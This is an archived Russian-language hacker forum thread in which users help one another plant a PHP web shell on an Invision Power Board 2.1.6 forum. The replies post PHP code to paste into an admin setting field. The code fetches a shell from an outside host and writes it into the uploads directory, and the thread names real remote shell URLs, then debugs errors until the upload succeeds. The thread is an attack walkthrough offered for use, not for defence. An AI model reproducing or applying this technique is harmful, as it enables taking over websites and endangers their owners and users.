PDA

Просмотр полной версии : Ipb 2.1.6 проблема с шеллом


=XSS=
22.11.2006, 02:07
IPB 2.1.6
пытаюсь залить на форум шелл через аватары. добавляю расширение .phtml в админке и загружаю шелл как свой аватар.
загружается в папку uploads (пробовал и другие папки) но при обращению к залитому шеллу выходит сообщение

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@.net and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.36 Server


как такое пофиксить?

=XSS=
22.11.2006, 03:37
в чем тут дело?

_Great_
22.11.2006, 08:30
читай error.log, если есть возможность. Там вся инфа об ошибке

MegaBits
22.11.2006, 13:38
Попробуй залить вот этим способом у меня всегда получалось.

Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки:" пишем любой php код, на пример такой:
PHP код:
$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);

Если не получится почитай статью "Заливаем шелл в Ipb 2.*.*(и больше не спрашиваем:))" автор VampiRUS

=XSS=
25.11.2006, 08:27
ничего из этого не работает.
ввожу этот код - нет загрузки.

_Great_
25.11.2006, 09:01
Видно, не судьба, видно, не судьба (С)

А вообще нафиг расширение phtml.
Берешь файл shell.php и заливаешь его

=XSS=
25.11.2006, 09:22
и еще надо писать что-то в полях
Название настройки:
и
Группа настройки:
?

или вообще ничего заполнять не надо?

=XSS=
25.11.2006, 09:27
_Great_
ты имеешь ввиду через аватары? но тогда надо менять настройки для загружаемого файла .php
и менять MIME-тип файла у php на application/octet-stream

=XSS=
25.11.2006, 09:41
сейчас такая ситуация:
когда пытаюсь обратиться к шеллу через браузер выходит сообщение

Parse error: syntax error, unexpected $end in /home/site/public_html/forum/uploads/shell.php on line 1078

c411k
25.11.2006, 09:46
Видно, не судьба, видно, не судьба (С)

А вообще нафиг расширение phtml.
Берешь файл shell.php и заливаешь его
а ты попробуй..
*.php ибп переименовывает в *.txt..

ничего из этого не работает.
ввожу этот код - нет загрузки.

$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";

http://site.ru/shell.txt меняешь к примеру на http://grinayxakep.narod.ru/antichat.1.6.php
/usr/home/www/site/public_html/forum/uploads/shell.php меняешь на доступную для записи диру (там где авы доспупно практ. всегда) и все работает..

=XSS=
25.11.2006, 09:47
+ еще такое
все делаю как в статье, добаляю новую настройку ввожу код, пишу имя настройки, и на выходе получаю вот это:

IPB Предупреждение [2] fopen(http://site.narod.ru/shell.txt) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Строка: 3 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
...
и так много строк еще...

=XSS=
25.11.2006, 09:57
$linky="http://site.ru/shell.txt";
$saved="/usr/home/www/site/public_html/forum/uploads/shell.php";

http://site.ru/shell.txt меняешь к примеру на http://grinayxakep.narod.ru/antichat.1.6.php
/usr/home/www/site/public_html/forum/uploads/shell.php меняешь на доступную для записи диру (там где авы доспупно практ. всегда) и все работает..


$linky="http://site.narod.ru/shell.txt";
$saved="/home/site/public_html/forum/uploads/shell.php";

в том то и дело что не работает

либо показывает ошибку парсинга как я писал вверху
либо флудит вот такой ерундой

IPB Предупреждение [2] fopen(http://site.narod.ru/shell.txt) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Строка: 3 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] fgets(): supplied argument is not a valid stream resource (Строка: 6 файла /sources/action_admin/settings.php(1474) : eval()'d code)
IPB Предупреждение [2] feof(): supplied argument is not a valid stream resource (Строка: 5 файла /sources/action_admin/settings.php(1474) : eval()'d code)

kyzmi4
25.11.2006, 11:00
Читай что написанно:
IPB Предупреждение [2] fopen(http://site.narod.ru/shell.txt) [function.fopen]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found (Строка: 3 файла /sources/action_admin/settings.php(1474) : eval()'d code)

404 Not Found. Заместо site.narod.ru/site.txt надо ввести ссылку, где у тебя шелл залит.

=XSS=
25.11.2006, 11:33
залил шелл от античат.
почему не заливался шелл от rst ?

и еще проблема:
через шелл от античат был создан файл с кодом шелла от рст и я там сделал возможность входа по паролю. но шелл не хочет меня пускать. можно только юзать шелл без пароля

=XSS=
25.11.2006, 11:53
проблема шелла от рст в том что заливается только 37.85 Kb от файла. фиг знает почему?

c411k
25.11.2006, 20:51
проблема шелла от рст в том что заливается только 37.85 Kb от файла. фиг знает почему?
откуда ты его заливаешь?? вот отсюда пробни http://gbl.nightmail.ru/rst.php
на будущее проверяй сначало все и старайся не тупить жестко.. site.ru/shell.txt мог бы пошевелись извилиной..

=XSS=
26.11.2006, 02:52
всем спасибо!

c411k
ты имеешь ввиду с народа нельзя заливать?

и еще как можно объяснить то что шелл отказывается авторизовывать меня по моему паролю который записан в шелле как md5 ?
я проверял несколько раз - не пускает!!!

][AКЕР
26.11.2006, 11:31
попробуй поменять пароль!без md5